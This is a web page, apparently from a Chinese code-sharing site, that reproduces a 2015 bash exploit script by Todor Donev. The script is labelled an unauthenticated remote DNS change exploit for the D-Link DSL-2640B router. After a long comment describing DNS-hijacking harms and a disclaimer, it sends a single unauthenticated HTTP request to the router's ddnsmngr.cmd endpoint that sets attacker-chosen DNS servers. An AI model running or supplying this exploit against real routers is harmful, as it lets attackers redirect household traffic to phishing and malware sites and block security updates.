扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 |
#!/bin/bash # #D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit # #Copyright 2015 (c) Todor Donev <todor.donev at gmail.com> #http://www.ethical-hacker.org/ #https://www.facebook.com/ethicalhackerorg # #Description: #Different D-Link Routers are vulnerable to DNS change. #The vulnerability exist in the web interface, which is #accessible without authentication. # #Tested firmware version: EU_2.03 #ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link #DEVICES OR FIRMWARE VERSIONS MAY AFFECTED. # #Once modified, systems use foreign DNS servers,which are #usually set up by cybercriminals. Users with vulnerable #systems or devices who try to access certain sites are #instead redirected to possibly malicious sites. # #Modifying systems' DNS settings allows cybercriminals to #perform malicious activities like: # #oSteering unknowing users to bad sites: # These sites can be phishing pages that # spoof well-known sites in order to # trick users into handing out sensitive # information. # #oReplacing ads on legitimate sites: # Visiting certain sites can serve users # with infected systems a different set # of ads from those whose systems are # not infected. # #oControlling and redirecting network traffic: # Users of infected systems may not be granted # access to download important OS and software # updates from vendors like Microsoft and from # their respective security vendors. # #oPushing additional malware: # Infected systems are more prone to other # malware infections (e.g., FAKEAV infection). # #Disclaimer: #This or previous programs is for Educational #purpose ONLY. Do not use it without permission. #The usual disclaimer applies, especially the #fact that Todor Donev is not liable for any #damages caused by direct or indirect use of the #information or functionality provided by these #programs. The author or any Internet provider #bears NO responsibility for content or misuse #of these programs or any derivatives thereof. #By using these programs you accept the fact #that any damage (dataloss, system crash, #system compromise, etc.) caused by the use #of these programs is not Todor Donev's #responsibility. # #Use them at your own risk! # if [[ $# -gt 3 || $# -lt 2 ]]; then echo " D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit" echo "================================================================" echo "Usage: $0 <Target> <Preferred DNS> <Alternate DNS>" echo "Example: $0 192.168.1.1 8.8.8.8" echo "Example: $0 192.168.1.1 8.8.8.8 8.8.4.4" echo "" echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>" echo "http://www.ethical-hacker.org/" echo " https://www.facebook.com/ethicalhackerorg" exit; fi GET=<code>which GET 2>/dev/null if [ $? -ne 0 ]; then echo "Error : libwww-perl not found =/" exit; fi GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1 |
体验盒子
